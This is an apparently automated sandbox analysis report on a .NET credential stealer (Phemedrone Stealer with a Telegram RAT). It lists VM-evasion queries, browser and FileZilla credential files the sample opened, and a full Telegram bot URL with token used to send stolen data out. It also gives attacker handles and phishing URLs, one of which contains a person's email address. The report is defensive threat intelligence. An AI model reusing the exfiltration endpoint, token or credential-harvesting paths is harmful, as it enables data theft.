            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Itaxyhi.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeMemory allocated: 1ABA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599215Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598050Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597780Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597441Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWindow / User API: threadDelayed 899Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWindow / User API: threadDelayed 5018Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599215s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -598050s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597441s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5156Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exe TID: 1708Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599215Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 598050Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597780Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597441Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597218Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597109Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596890Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596671Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Itaxyhi.exe, 00000000.00000002.2152040764.0000000000D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWvice%SystemRoot%\system32\mswsock.dll" />
            Source: C:\Users\user\Desktop\Itaxyhi.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: Itaxyhi.exe, Evyvybyhyny.csReference to suspicious API methods: LoadLibrary(Hebovacenibyrymat)
            Source: Itaxyhi.exe, Evyvybyhyny.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, Fyfibynesohixeteh), typeof(T))
            Source: Itaxyhi.exe, Isocyxorura.csReference to suspicious API methods: Asegepipela.Kernel32.OpenProcess(Asegepipela.Ytelivynyhuciju.DuplicateHandle, bInheritHandle: true, (uint)Xyjateguvokikyjeg)
            Source: C:\Users\user\Desktop\Itaxyhi.exeQueries volume information: C:\Users\user\Desktop\Itaxyhi.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Itaxyhi.exe, 00000000.00000002.2154041215.000000001CBC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Itaxyhi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\Itaxyhi.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Itaxyhi.exe PID: 6504, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Masquerading            		2
            OS Credential Dumping            		241
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory251
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol2
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Obfuscated Files or Information            		NTDS123
            System Information Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA SecretsInternet Connection DiscoverySSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Itaxyhi.exe79%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            Itaxyhi.exe100%Joe Sandbox ML
            Itaxyhi.exe70%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ns.adobt/pg/0%Avira URL Cloudsafe
            https://get.ge0%Avira URL Cloudsafe
            http://ns.ad0/g/im0%Avira URL Cloudsafe
            https://get.ge2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            get.geojs.io
            		172.67.70.233
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://get.geojs.io/v1/ip/geo.jsonfalse
                  		high
                  https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocumentfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://get.geojs.ioItaxyhi.exe, 00000000.00000002.2152408176.0000000002D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://api.telegram.orgItaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/wsdl/Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://get.geItaxyhi.exe, 00000000.00000002.2152408176.0000000002D25000.00000004.00000800.00020000.00000000.sdmptrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://get.geojs.ioItaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://t.me/TheDyerItaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ns.adobt/pg/Itaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://api.telegram.orgItaxyhi.exe, 00000000.00000002.2152408176.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://ns.ad0/g/imItaxyhi.exe, 00000000.00000002.2152316151.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameItaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot7105333862:AAE6XaSuAERR5F_VgpAajrgcx8b0mCmMnqM/sendDocument(UnitedItaxyhi.exe, 00000000.00000002.2152408176.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://t.me/webster480Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp, Itaxyhi.exe, 00000000.00000002.2152408176.0000000002D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        		api.telegram.orgUnited Kingdom
                                        		62041TELEGRAMRUfalse
                                        172.67.70.233
                                        		get.geojs.ioUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1572892
                                        Start date and time:2024-12-11 07:31:06 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 2m 17s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:2
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Itaxyhi.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/1@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 6
                                        • Number of non-executed functions: 6
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63
                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        01:31:58API Interceptor32x Sleep call for process: Itaxyhi.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        149.154.167.220https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                          Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                            17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                  ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                            172.67.70.233rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                              gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                system.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                  upd.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                    DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                      https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ==Get hashmaliciousUnknownBrowse
                                                                        https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FBxs3IiLfKU2eWewQOro8W1Fa/dGVycmkucm9zYUByYXZlaXMuY29tGet hashmaliciousTycoon2FABrowse
